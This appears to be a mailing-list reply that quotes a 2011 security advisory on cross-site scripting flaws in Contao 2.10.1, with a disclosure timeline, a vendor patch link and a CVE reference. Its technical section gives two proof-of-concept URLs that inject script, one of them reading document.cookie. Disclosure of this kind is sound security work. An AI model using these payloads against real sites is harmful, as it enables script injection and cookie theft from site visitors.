Re: Contao 2.10.1 Cross-site scripting vulnerability



On Sat, Oct 08, 2011 at 07:59:27AM +0000, sschurtz@xxxxxxxxxxx wrote:
Advisory: Contao 2.10.1 Cross-site scripting vulnerability
Advisory ID: SSCHADV2011-025
Author: Stefan Schurtz
Affected Software: Successfully tested on Contao 2.10.1
Vendor URL: http://www.contao.org/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

Contao 2.10 is prone to multiple Cross-site scripting vulnerability

==================
Technical Details:
==================

http://<target>/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://<target>/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>

=========
Solution:
=========

- Vendor patch available - http://dev.contao.org/projects/typolight/repository/revisions/1041
- Release of a new version 2.10.2 next week

====================
Disclosure Timeline:
====================

07-Oct-2011 - informed developers (contao@xxxxxxxxxxxxxx)
07-Oct-2011 - vendor fix
08-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.contao.org/
http://dev.contao.org/projects/typolight/repository/revisions/1041
http://www.rul3z.de/advisories/SSCHADV2011-025.txt

http://osvdb.org/show/osvdb/76293
CVE-2011-4335

- Henri Salo



Relevant Pages

  • [NT] ActiveSync Denial of Service Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By "pretending" to be an iPAQ and connecting to TCP port 5679, ... sending a corrupted "I would like to sync with you" packet, ... Sample code to demonstrate the vulnerability is shown below: ...
    (Securiteam)
  • [Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Full-Disclosure)
  • Re: MS09-032 Installation
    ... Security Advisory 953839, Microsoft Security Advisory 956391, Microsoft ... Vulnerability - CVE-2008-0015, as does the FixIt some had used before ... be a mistake to "undo" the workaround, ... What would happen if I install this update and then undo the ...
    (microsoft.public.security)
  • Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-200812
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Bugtraq)
  • WSPortal version 1.0 Path Disclosure Vulnerability
    ... WSPortal version 1.0 Path Disclosure Vulnerability ... WSPortal is a site management system coded in PHP/MySQL. ... There is no official fix at the release of this Security Advisory. ...
    (Bugtraq)